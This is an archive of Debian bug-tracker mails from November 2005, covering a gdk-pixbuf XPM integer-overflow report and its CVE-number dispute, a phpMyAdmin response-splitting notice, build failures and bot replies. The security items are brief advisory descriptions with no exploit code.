(TLS-1.0:RSA_AES_256_CBC_SHA:32) (Exim 4.50) id 1EcJQ4-0006J7-RE for [EMAIL PROTECTED]; Wed, 16 Nov 2005 10:17:32 +0100 Received: from jmm by localhost.localdomain with local (Exim 4.54) id 1EcJPw-0001PW-KK; Wed, 16 Nov 2005 10:17:24 +0100 Content-Type: text/plain; charset=us-ascii MIME-Version: 1.0 Content-Transfer-Encoding: 7bit From: Moritz Muehlenhoff [EMAIL PROTECTED] To: Debian Bug Tracking System [EMAIL PROTECTED] Subject: CVE-2005-3186: Integer overflow in gdk-pixbuf's XPM code X-Mailer: reportbug 3.17 Date: Wed, 16 Nov 2005 10:17:24 +0100 X-Debbugs-Cc: Debian Security Team [EMAIL PROTECTED] Message-Id: [EMAIL PROTECTED] X-SA-Exim-Connect-IP: 134.102.116.5 X-SA-Exim-Mail-From: [EMAIL PROTECTED] X-SA-Exim-Scanned: No (on vserver151.vserver151.serverflex.de); SAEximRunCond expanded to false Delivered-To: [EMAIL PROTECTED] X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 (1.212-2003-09-23-exp) on spohr.debian.org X-Spam-Level: X-Spam-Status: No, hits=-11.0 required=4.0 tests=BAYES_00,HAS_PACKAGE, X_DEBBUGS_CC autolearn=ham version=2.60-bugs.debian.org_2005_01_02 Package: gtk+2.0 Severity: grave Tags: security Justification: user security hole An integer overflow in gdk-pixbuf's XPM rendering code can be exploited to overwrite the heap and exploit arbitrary code through crafted images. Please see www.idefense.com/application/poi/display?id=339type=vulnerabilities for more details. Cheers, Moritz -- System Information: Debian Release: testing/unstable APT prefers unstable APT policy: (500, 'unstable') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.14-1-686 Locale: LANG=C, [EMAIL PROTECTED] (charmap=ISO-8859-15) --- Received: (at 339458-close) by bugs.debian.org; 16 Nov 2005 19:41:26 + From [EMAIL PROTECTED] Wed Nov 16 11:41:26 2005 Return-path: [EMAIL PROTECTED] Received: from katie by spohr.debian.org with local (Exim 4.50) id 1EcT0p-0008N5-9S; Wed, 16 Nov 2005 11:32:07 -0800 From: Ryan Murray [EMAIL PROTECTED] To: [EMAIL PROTECTED] X-Katie: $Revision: 1.56 $ Subject: Bug#339458: fixed in gdk-pixbuf 0.22.0-11 Message-Id: [EMAIL PROTECTED] Sender: Archive Administrator [EMAIL PROTECTED] Date: Wed, 16 Nov 2005 11:32:07 -0800 X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 (1.212-2003-09-23-exp) on spohr.debian.org X-Spam-Level: X-Spam-Status: No, hits=-6.0 required=4.0 tests=BAYES_00,HAS_BUG_NUMBER autolearn=no version=2.60-bugs.debian.org_2005_01_02 Source: gdk-pixbuf Source-Version: 0.22.0-11 We believe that the bug you reported is fixed in the latest version of gdk-pixbuf, which is due to be installed in the Debian FTP archive: gdk-pixbuf_0.22.0-11.diff.gz to pool/main/g/gdk-pixbuf/gdk-pixbuf_0.22.0-11.diff.gz gdk-pixbuf_0.22.0-11.dsc to pool/main/g/gdk-pixbuf/gdk-pixbuf_0.22.0-11.dsc libgdk-pixbuf-dev_0.22.0-11_i386.deb to pool/main/g/gdk-pixbuf/libgdk-pixbuf-dev_0.22.0-11_i386.deb libgdk-pixbuf-gnome-dev_0.22.0-11_i386.deb to pool/main/g/gdk-pixbuf/libgdk-pixbuf-gnome-dev_0.22.0-11_i386.deb libgdk-pixbuf-gnome2_0.22.0-11_i386.deb to pool/main/g/gdk-pixbuf/libgdk-pixbuf-gnome2_0.22.0-11_i386.deb libgdk-pixbuf2_0.22.0-11_i386.deb to pool/main/g/gdk-pixbuf/libgdk-pixbuf2_0.22.0-11_i386.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to [EMAIL PROTECTED], and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Ryan Murray [EMAIL PROTECTED] (supplier of updated gdk-pixbuf
Bug#339517: findlib: FTBFS on m68k (ocaml segfault)
Package: findlib Severity: serious Justification: no longer builds from source Hi, findlib currently fails to build on m68k with the following error: make[2]: Entering directory `/build/buildd/findlib-1.1/src/findlib-toolbox' ocamlc -o make_wizard -I +labltk -I ../findlib unix.cma str.cma labltk.cma \ findlib.cma make_wizard.ml File make_wizard.ml, line 1288, characters 6-12: Warning Y: unused variable update. make[2]: *** [make_wizard] Segmentation fault make[2]: *** Deleting file `make_wizard' make[2]: Leaving directory `/build/buildd/findlib-1.1/src/findlib-toolbox' The same error already happened with 1.0.4-4, and is probably tk or ocaml-related. Please reassign as appropriate. (it would probably be helpful to get a backtrace from the segfault) Cheers, Julien Cristau -- System Information: Debian Release: testing/unstable APT prefers testing APT policy: (990, 'testing'), (500, 'unstable'), (1, 'experimental') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/dash Kernel: Linux 2.6.13 Locale: LANG=C, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#338529: mcvs: FTBFS: dangling symlink /usr/lib/clisp/base/lispinit.mem
Hi, Peter Van Eynde wrote: cd code; ./install.sh /usr /tmp/buildd/mcvs-1.0.13/debian/mcvs/ /usr/lib/clisp/base/lisp.run: operating system error during load of initialization file `/usr/lib/clisp/base/lispinit.mem' [spvw_memfile.d:834] Is the clisp package configured? This should not happen if the package is configured. Without the build dependencies configured, pbuilder wouldn't even try to compile the package. Did you try? bye, Roland -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#339480: security patch in 4.0.1-2 breaks tkdiff
On Wed, Nov 16, 2005 at 11:00:12 -0500 (-0500), Joe Drew wrote: Package: tkdiff Version: 1:4.0.2-2 Severity: grave Arrgh - my deepest apologies. There was typo in the patch (missing $). If you goto line 464 and change it to: close $fid That'll fix it. New upload on its way Adrian -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#338934: parrot - FTBFS: Segmentation fault
tag 338934 + confirmed fixed-upstream thanks I fixed this bug in the SVN tree, as well as the hppa and ia64 build failures. I currently work on mips and mipsel. Regards, Flo -- BOFH excuse #94: Internet outage signature.asc Description: Digital signature
Processed: note buggy versions
Processing commands for [EMAIL PROTECTED]: found 326103 2.16.1-2 Bug#326103: binutils: gcc -u hits ld segfault w/ certain -u options Bug#335713: mklibs: [powerpc] failfs when building the gtk d-i. Bug#335885: mklibs: [powerpc] failfs when building the gtk d-i. Bug marked as found in version 2.16.1-2. found 326103 2.16.1-3 Bug#326103: binutils: gcc -u hits ld segfault w/ certain -u options Bug#335713: mklibs: [powerpc] failfs when building the gtk d-i. Bug#335885: mklibs: [powerpc] failfs when building the gtk d-i. Bug marked as found in version 2.16.1-3. stop Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Processed: Fixed in NMU of amap 4.8-1.1
Processing commands for [EMAIL PROTECTED]: tag 285090 + fixed Bug#285090: amap: FTBFS (amd64/gcc-4.0): invalid lvalue in assignment Tags were: patch Tags added: fixed quit Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#287635: marked as done (mcdp: FTBFS (amd64/gcc-4.0): invalid storage class for function 'cd_cddbsum')
Your message dated Wed, 16 Nov 2005 14:02:21 -0800 with message-id [EMAIL PROTECTED] and subject line Bug#287635: fixed in mcdp 0.4-3 has caused the attached Bug report to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what I am talking about this indicates a serious mail system misconfiguration somewhere. Please contact me immediately.) Debian bug tracking system administrator (administrator, Debian Bugs database) -- Received: (at submit) by bugs.debian.org; 29 Dec 2004 08:52:13 + From [EMAIL PROTECTED] Wed Dec 29 00:52:13 2004 Return-path: [EMAIL PROTECTED] Received: from d007021.adsl.hansenet.de (localhost.localdomain) [80.171.7.21] by spohr.debian.org with esmtp (Exim 3.35 1 (Debian)) id 1CjZYy-00042a-00; Wed, 29 Dec 2004 00:52:12 -0800 Received: from aj by localhost.localdomain with local (Exim 4.34) id 1CjZeB-0006Da-Lk; Wed, 29 Dec 2004 09:57:35 +0100 To: Debian Bug Tracking System [EMAIL PROTECTED] From: Andreas Jochens [EMAIL PROTECTED] Subject: mcdp: FTBFS (amd64/gcc-4.0): invalid storage class for function 'cd_cddbsum' Message-Id: [EMAIL PROTECTED] Date: Wed, 29 Dec 2004 09:57:35 +0100 Delivered-To: [EMAIL PROTECTED] X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2004_03_25 (1.212-2003-09-23-exp) on spohr.debian.org X-Spam-Status: No, hits=-8.0 required=4.0 tests=BAYES_00,HAS_PACKAGE autolearn=no version=2.60-bugs.debian.org_2004_03_25 X-Spam-Level: Package: mcdp Severity: normal Tags: patch When building 'mcdp' on amd64 with gcc-4.0, I get the following error: gcc -Os -Wall -pipe -fomit-frame-pointer -c cddb.c -o cddb.o cddb.c: In function 'cddb_parseentry': cddb.c:33: warning: pointer targets in passing argument 1 of 'str_len' differ in signedness cddb.c:33: warning: pointer targets in passing argument 1 of 'str_ncpy' differ in signedness cddb.c:33: warning: pointer targets in passing argument 2 of 'str_ncpy' differ in signedness cddb.c:35: warning: pointer targets in passing argument 1 of 'str_len' differ in signedness cddb.c:35: warning: pointer targets in passing argument 1 of 'str_ncpy' differ in signedness cddb.c:35: warning: pointer targets in passing argument 2 of 'str_ncpy' differ in signedness cddb.c: In function 'cddb_getentries': cddb.c:138: warning: pointer targets in passing argument 1 of 'str_len' differ in signedness cddb.c:141: warning: pointer targets in passing argument 1 of 'str_len' differ in signedness gcc -Os -Wall -pipe -fomit-frame-pointer -c cddev.c -o cddev.o cddev.c: In function 'cd_discid': cddev.c:54: error: invalid storage class for function 'cd_cddbsum' make[1]: *** [cddev.o] Error 1 make[1]: Leaving directory `/mcdp-0.4' make: *** [build-stamp] Error 2 With the attached patch 'mcdp' can be compiled on amd64 using gcc-4.0. Regards Andreas Jochens diff -urN ../tmp-orig/mcdp-0.4/cddev.c ./cddev.c --- ../tmp-orig/mcdp-0.4/cddev.c2004-02-20 10:24:05.0 +0100 +++ ./cddev.c 2004-12-29 09:54:38.405752696 +0100 @@ -51,7 +51,7 @@ /* look at the specs, should do, what they want :) */ unsigned cd_discid(struct mcdp *cd) { - static unsigned cd_cddbsum(register int n) { + unsigned cd_cddbsum(register int n) { register unsigned int ret=0; while (n0) { ret += (n%10); n /= 10; --- Received: (at 287635-close) by bugs.debian.org; 16 Nov 2005 22:12:53 + From [EMAIL PROTECTED] Wed Nov 16 14:12:53 2005 Return-path: [EMAIL PROTECTED] Received: from katie by spohr.debian.org with local (Exim 4.50) id 1EcVMD-0005Ka-E1; Wed, 16 Nov 2005 14:02:21 -0800 From: Frederik Dannemare [EMAIL PROTECTED] To: [EMAIL PROTECTED] X-Katie: $Revision: 1.56 $ Subject: Bug#287635: fixed in mcdp 0.4-3 Message-Id: [EMAIL PROTECTED] Sender: Archive Administrator [EMAIL PROTECTED] Date: Wed, 16 Nov 2005 14:02:21 -0800 X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 (1.212-2003-09-23-exp) on spohr.debian.org X-Spam-Level: X-Spam-Status: No, hits=-6.0 required=4.0 tests=BAYES_00,HAS_BUG_NUMBER autolearn=no version=2.60-bugs.debian.org_2005_01_02 Source: mcdp Source-Version: 0.4-3 We believe that the bug you reported is fixed in the latest version of mcdp, which is due to be installed in the Debian FTP archive: mcdp_0.4-3.diff.gz to pool/main/m/mcdp/mcdp_0.4-3.diff.gz mcdp_0.4-3.dsc to pool/main/m/mcdp/mcdp_0.4-3.dsc mcdp_0.4-3_sparc.deb to pool/main/m/mcdp/mcdp_0.4-3_sparc.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to [EMAIL PROTECTED], and the maintainer will reopen the bug report if appropriate. Debian
Bug#339458: acknowledged by developer (Bug#339458: fixed in gdk-pixbuf 0.22.0-11)
Debian Bug Tracking System wrote: Changes: gdk-pixbuf (0.22.0-11) unstable; urgency=high . * Fix for integer overflows in io-xpm.c which could be exploited to execute arbitrary code (CVE-2005-2975 and CVE-2005-2976 from https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=171900) and Fix for endless loop in io-xpm.c which could cause applications to hang (CVE-2005-3186 from https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=171071) (closes: #339458) Just for the record; the CVE mappings are not correct: The DoS through endless loop issue is CVE-2005-2975, the n_col integer overflow is CVE-2005-3186 and the pixels integer overflow is CVE-2005-2976. Cheers, Moritz -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Processed: cloning 338436, reassign -1 to sylpheed-claws-gtk2
Processing commands for [EMAIL PROTECTED]: # Automatically generated email from bts, devscripts version 2.9.8 clone 338436 -1 Bug#338436: sylpheed-claws: Buffer overflow in LDIF/pine/mutt import Bug 338436 cloned as bug 339529. #Affects also GTK2 version reassign -1 sylpheed-claws-gtk2 Bug#339529: sylpheed-claws: Buffer overflow in LDIF/pine/mutt import Bug reassigned from package `sylpheed-claws' to `sylpheed-claws-gtk2'. End of message, stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#339409: typo in lib64z1-dev dependency
On Wed, Nov 16, 2005 at 04:43:40AM +0100, Matthias Klose wrote: s/lib64c-dev/lib64c6-dev/ The version of glibc in unstable seems to disagree with that one (not that it matters too much given your subsequent message). -- You grabbed my hand and we fell into it, like a daydream - or a fever. signature.asc Description: Digital signature
Bug#339437: marked as done (HTTP Response Splitting vulnerability)
Your message dated Wed, 16 Nov 2005 14:47:15 -0800 with message-id [EMAIL PROTECTED] and subject line Bug#339437: fixed in phpmyadmin 4:2.6.4-pl4-1 has caused the attached Bug report to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what I am talking about this indicates a serious mail system misconfiguration somewhere. Please contact me immediately.) Debian bug tracking system administrator (administrator, Debian Bugs database) -- Received: (at submit) by bugs.debian.org; 16 Nov 2005 10:23:12 + From [EMAIL PROTECTED] Wed Nov 16 02:23:12 2005 Return-path: [EMAIL PROTECTED] Received: from r5ap74.chello.upc.cz ([86.49.49.74] helo=cihar.com) by spohr.debian.org with esmtp (Exim 4.50) id 1EcKRc-0008Od-Ca for [EMAIL PROTECTED]; Wed, 16 Nov 2005 02:23:12 -0800 Received: from michal by cihar.com with local (Exim 4.54) id 1EcKRm-0002ZC-0G; Wed, 16 Nov 2005 11:23:22 +0100 MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Content-Type: text/plain; charset=UTF-8 From: =?utf-8?b?TWljaGFsIMSMaWhhxZk=?= [EMAIL PROTECTED] To: Debian Bug Tracking System [EMAIL PROTECTED] Subject: HTTP Response Splitting vulnerability X-Mailer: reportbug 3.17 Date: Wed, 16 Nov 2005 11:23:21 +0100 X-Debbugs-Cc: Debian Security Team [EMAIL PROTECTED] Message-Id: [EMAIL PROTECTED] Delivered-To: [EMAIL PROTECTED] X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 (1.212-2003-09-23-exp) on spohr.debian.org X-Spam-Level: X-Spam-Status: No, hits=-11.0 required=4.0 tests=BAYES_00,HAS_PACKAGE, X_DEBBUGS_CC autolearn=ham version=2.60-bugs.debian.org_2005_01_02 Package: phpmyadmin Version: 4:2.6.4-pl3-1 Severity: grave Tags: security Hi I'm not sure if you're aware of new security issue found in phpMyAdmin: http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2005-6 I know it's too young to be already in archives, however I just want to notify you. -- Michal ÄihaÅ | http://cihar.com -- System Information: Debian Release: testing/unstable APT prefers unstable APT policy: (500, 'unstable'), (1, 'experimental') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/dash Kernel: Linux 2.6.14-raptor Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) Versions of packages phpmyadmin depends on: ii apache2-mpm-prefork [httpd] 2.0.55-3 traditional model for Apache2 ii debconf [debconf-2.0] 1.4.59 Debian configuration management sy ii php5-cgi 5.0.5-3server-side, HTML-embedded scripti ii php5-mysql5.0.5-3MySQL module for php5 ii ucf 2.003 Update Configuration File: preserv Versions of packages phpmyadmin recommends: pn php4-mcrypt | php5-mcrypt none (no description available) -- debconf information: * phpmyadmin/reconfigure-webserver: apache2 * phpmyadmin/restart-webserver: true --- Received: (at 339437-close) by bugs.debian.org; 16 Nov 2005 22:51:37 + From [EMAIL PROTECTED] Wed Nov 16 14:51:37 2005 Return-path: [EMAIL PROTECTED] Received: from katie by spohr.debian.org with local (Exim 4.50) id 1EcW3f-00037r-7X; Wed, 16 Nov 2005 14:47:15 -0800 From: Piotr Roszatycki [EMAIL PROTECTED] To: [EMAIL PROTECTED] X-Katie: $Revision: 1.56 $ Subject: Bug#339437: fixed in phpmyadmin 4:2.6.4-pl4-1 Message-Id: [EMAIL PROTECTED] Sender: Archive Administrator [EMAIL PROTECTED] Date: Wed, 16 Nov 2005 14:47:15 -0800 X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 (1.212-2003-09-23-exp) on spohr.debian.org X-Spam-Level: X-Spam-Status: No, hits=-6.0 required=4.0 tests=BAYES_00,HAS_BUG_NUMBER autolearn=no version=2.60-bugs.debian.org_2005_01_02 X-CrossAssassin-Score: 2 Source: phpmyadmin Source-Version: 4:2.6.4-pl4-1 We believe that the bug you reported is fixed in the latest version of phpmyadmin, which is due to be installed in the Debian FTP archive: phpmyadmin_2.6.4-pl4-1.diff.gz to pool/main/p/phpmyadmin/phpmyadmin_2.6.4-pl4-1.diff.gz phpmyadmin_2.6.4-pl4-1.dsc to pool/main/p/phpmyadmin/phpmyadmin_2.6.4-pl4-1.dsc phpmyadmin_2.6.4-pl4-1_all.deb to pool/main/p/phpmyadmin/phpmyadmin_2.6.4-pl4-1_all.deb phpmyadmin_2.6.4-pl4.orig.tar.gz to pool/main/p/phpmyadmin/phpmyadmin_2.6.4-pl4.orig.tar.gz A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to [EMAIL PROTECTED], and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Piotr Roszatycki [EMAIL PROTECTED] (supplier of updated phpmyadmin package) (This message
Bug#339458: acknowledged by developer (Bug#339458: fixed in gdk-pixbuf 0.22.0-11)
On Wed, Nov 16, 2005 at 11:33:35PM +0100, Moritz Muehlenhoff wrote: Debian Bug Tracking System wrote: Changes: gdk-pixbuf (0.22.0-11) unstable; urgency=high . * Fix for integer overflows in io-xpm.c which could be exploited to execute arbitrary code (CVE-2005-2975 and CVE-2005-2976 from https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=171900) and Fix for endless loop in io-xpm.c which could cause applications to hang (CVE-2005-3186 from https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=171071) (closes: #339458) Just for the record; the CVE mappings are not correct: The DoS through endless loop issue is CVE-2005-2975, the n_col integer overflow is CVE-2005-3186 and the pixels integer overflow is CVE-2005-2976. My CVE mappings are based on the redhat bugs where I took the patches from. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#337756: dependency problem
No, having a broken kig is not the least bad solution. Linking with a testing approved library will allow a consistent version of kig to be in testing. -- Kevin Dalley [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#339125: marked as done (FTBFS: Unsatisfiable build-dependency on ocaml-nox-3.08.3)
Your message dated Thu, 17 Nov 2005 00:06:55 +0100 with message-id [EMAIL PROTECTED] and subject line FTBFS: Unsatisfiable build-dependency on ocaml-nox-3.08.3 has caused the attached Bug report to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what I am talking about this indicates a serious mail system misconfiguration somewhere. Please contact me immediately.) Debian bug tracking system administrator (administrator, Debian Bugs database) -- Received: (at submit) by bugs.debian.org; 15 Nov 2005 01:59:35 + From [EMAIL PROTECTED] Mon Nov 14 17:59:35 2005 Return-path: [EMAIL PROTECTED] Received: from zoot.lafn.org ([206.117.18.6]) by spohr.debian.org with esmtp (Exim 4.50) id 1Ebq6h-0004tB-KQ for [EMAIL PROTECTED]; Mon, 14 Nov 2005 17:59:35 -0800 Received: from localhost.localdomain (pool-71-104-166-233.lsanca.dsl-w.verizon.net [71.104.166.233]) (authenticated bits=0) by zoot.lafn.org (8.13.1/8.13.1) with ESMTP id jAF1xYNS047365 (version=TLSv1/SSLv3 cipher=AES256-SHA bits=256 verify=NO) for [EMAIL PROTECTED]; Mon, 14 Nov 2005 17:59:35 -0800 (PST) (envelope-from [EMAIL PROTECTED]) Received: from kraai by localhost.localdomain with local (Exim 4.54) id 1EblLL-xI-FF for [EMAIL PROTECTED]; Mon, 14 Nov 2005 12:54:23 -0800 Date: Mon, 14 Nov 2005 12:54:23 -0800 From: Matt Kraai [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: FTBFS: Unsatisfiable build-dependency on ocaml-nox-3.08.3 Message-ID: [EMAIL PROTECTED] Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol=application/pgp-signature; boundary=n8g4imXOkfNTN/H1 Content-Disposition: inline User-Agent: Mutt/1.5.9i X-Virus-Scanned: ClamAV 0.86.2/1169/Fri Nov 11 13:28:05 2005 on zoot.lafn.org X-Virus-Status: Clean Delivered-To: [EMAIL PROTECTED] X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 (1.212-2003-09-23-exp) on spohr.debian.org X-Spam-Level: X-Spam-Status: No, hits=-7.6 required=4.0 tests=BAYES_00,DATE_IN_PAST_03_06, HAS_PACKAGE autolearn=no version=2.60-bugs.debian.org_2005_01_02 --n8g4imXOkfNTN/H1 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Package: pagodacf Version: 0.7-1 Severity: serious pbuilder fails to build pagodacf in an unstable chroot on i386: - Considering ocaml-nox-3.08.3 - Trying ocaml-nox-3.08.3 - Cannot install ocaml-nox-3.08.3; apt errors follow: Reading package lists... Building dependency tree... E: Package ocaml-nox-3.08.3 has no installation candidate Package ocaml-nox-3.08.3 is not available, but is referred to by another = package. This may mean that the package is missing, has been obsoleted, or is only available from another source E: Could not satisfy build-dependency. --=20 Matt --n8g4imXOkfNTN/H1 Content-Type: application/pgp-signature; name=signature.asc Content-Description: Digital signature Content-Disposition: inline -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.1 (GNU/Linux) iD8DBQFDePl+fNdgYxVXvBARAiykAKCQU27bwd/s3+xXViuKMYhyDaLnEwCffY94 eKvSYb4Y/wUuxSGigS/0Hi0= =xkG0 -END PGP SIGNATURE- --n8g4imXOkfNTN/H1-- --- Received: (at 339125-done) by bugs.debian.org; 16 Nov 2005 23:07:27 + From [EMAIL PROTECTED] Wed Nov 16 15:07:27 2005 Return-path: [EMAIL PROTECTED] Received: from 25.235.97-84.rev.gaoland.net ([84.97.235.25] helo=babasse.is-a-geek.org) by spohr.debian.org with esmtp (Exim 4.50) id 1EcWND-00060x-M1 for [EMAIL PROTECTED]; Wed, 16 Nov 2005 15:07:27 -0800 Received: from smimram by babasse.is-a-geek.org with local (Exim 4.54) id 1EcWMh-00062C-Bp; Thu, 17 Nov 2005 00:06:55 +0100 Date: Thu, 17 Nov 2005 00:06:55 +0100 From: Samuel Mimram [EMAIL PROTECTED] To: Matt Kraai [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Subject: Re: FTBFS: Unsatisfiable build-dependency on ocaml-nox-3.08.3 Message-ID: [EMAIL PROTECTED] References: [EMAIL PROTECTED] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: [EMAIL PROTECTED] User-Agent: Mutt/1.5.11 X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 (1.212-2003-09-23-exp) on spohr.debian.org X-Spam-Level: X-Spam-Status: No, hits=-3.0 required=4.0 tests=BAYES_00 autolearn=no version=2.60-bugs.debian.org_2005_01_02 Hi, On Mon, Nov 14, 2005 at 12:54:23PM -0800, Matt Kraai wrote: Package: pagodacf Version: 0.7-1 Severity: serious pbuilder fails to build pagodacf in an unstable chroot on i386: - Considering ocaml-nox-3.08.3 - Trying ocaml-nox-3.08.3 - Cannot install ocaml-nox-3.08.3;
Bug#320375: Processed: Re: Bug#320375: conquest-gl: fail to start (Assertion `window-Window.VisualInfo != ((void *)0)' failed.)
This one time, at band camp, Clint Adams wrote: I hate to sound patronising, but does glutInit definitely get called before any other glut call? Seems pretty unconditional here. You're welcome to look at the source. I'll prepare an upload of freeglut 2.4 Real Soon Now, and then we'll see if the assertion still appears. I'll pass it back for now. freeglut 2.4.0 is in testing; do either of you see this bug still? -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Processed: closing 339125
Processing commands for [EMAIL PROTECTED]: # Automatically generated email from bts, devscripts version 2.9.8 close 339125 0.7-2 Bug#339125: FTBFS: Unsatisfiable build-dependency on ocaml-nox-3.08.3 'close' is deprecated; see http://www.debian.org/Bugs/Developer#closing. Bug marked as fixed in version 0.7-2, send any further explanations to Matt Kraai [EMAIL PROTECTED] End of message, stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#339458: acknowledged by developer (Bug#339458: fixed in gdk-pixbuf 0.22.0-11)
Ryan Murray wrote: On Wed, Nov 16, 2005 at 11:33:35PM +0100, Moritz Muehlenhoff wrote: Debian Bug Tracking System wrote: Changes: gdk-pixbuf (0.22.0-11) unstable; urgency=high . * Fix for integer overflows in io-xpm.c which could be exploited to execute arbitrary code (CVE-2005-2975 and CVE-2005-2976 from https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=171900) and Fix for endless loop in io-xpm.c which could cause applications to hang (CVE-2005-3186 from https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=171071) (closes: #339458) Just for the record; the CVE mappings are not correct: The DoS through endless loop issue is CVE-2005-2975, the n_col integer overflow is CVE-2005-3186 and the pixels integer overflow is CVE-2005-2976. My CVE mappings are based on the redhat bugs where I took the patches from. http://rhn.redhat.com/errata/RHSA-2005-810.html: A bug was found in the way gdk-pixbuf processes XPM images. An attacker could create a carefully crafted XPM file in such a way that it could cause an application linked with gdk-pixbuf to execute arbitrary code when the file was opened by a victim. The Common Vulnerabilities and Exposures project has assigned the name CVE-2005-3186 to this issue. Ludwig Nussel discovered an integer overflow bug in the way gdk-pixbuf processes XPM images. An attacker could create a carefully crafted XPM file in such a way that it could cause an application linked with gdk-pixbuf to execute arbitrary code or crash when the file was opened by a victim. The Common Vulnerabilities and Exposures project has assigned the name CVE-2005-2976 to this issue. Ludwig Nussel also discovered an infinite-loop denial of service bug in the way gdk-pixbuf processes XPM images. An attacker could create a carefully crafted XPM file in such a way that it could cause an application linked with gdk-pixbuf to stop responding when the file was opened by a victim. The Common Vulnerabilities and Exposures project has assigned the name CVE-2005-2975 to this issue. Cheers, Moritz -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#339523: libxine1: fails to build
On Wed, 16 Nov 2005, A.M.P. Boelens wrote: I try to rebuild linxine1 without stripping because it hangs on a certain mp3, but it won't build. I get the following error: [...] gcc -DHAVE_CONFIG_H -I. -I. -I../../../.. -I../../../.. -I../../../../include -I../../../../include -I../../../../src -I../../../../src/xine-engine -I../../../../src/xine-engine -I../../../../src/xine-utils -I../../../../src/input -I../../../../src/input -I../../../../lib -DSIMPLE_IDCT -DHAVE_AV_CONFIG_H -DRUNTIME_CPUDETECT -DUSE_FASTMEMCPY -DCONFIG_RISKY -DCONFIG_DECODERS -DXINE_MPEG_ENCODER -DCONFIG_ZLIB -mtune=athlon -O3 -pipe -fomit-frame-pointer -falign-functions=4 -falign-loops=4 -falign-jumps=4 -mpreferred-stack-boundary=2 -fexpensive-optimizations -fschedule-insns2 -fno-strict-aliasing -ffast-math -finline-functions -Wall -DNDEBUG -D_REENTRANT -D_FILE_OFFSET_BITS=64 -DXINE_COMPILE -Wnested-externs -Wcast-align -Wchar-subscripts -Wmissing-declarations -Wmissing-prototypes -g -O0 -MT dsputil_mmx.lo -MD -MP -MF .deps/dsputil_mmx.Tpo -c How did you manage to get -O0 to your compiler flags? It should be obvious that the C wrapped MMX assembler code only works if gcc is allowed to optimize the wrapping C away. Otherwise, the compiler 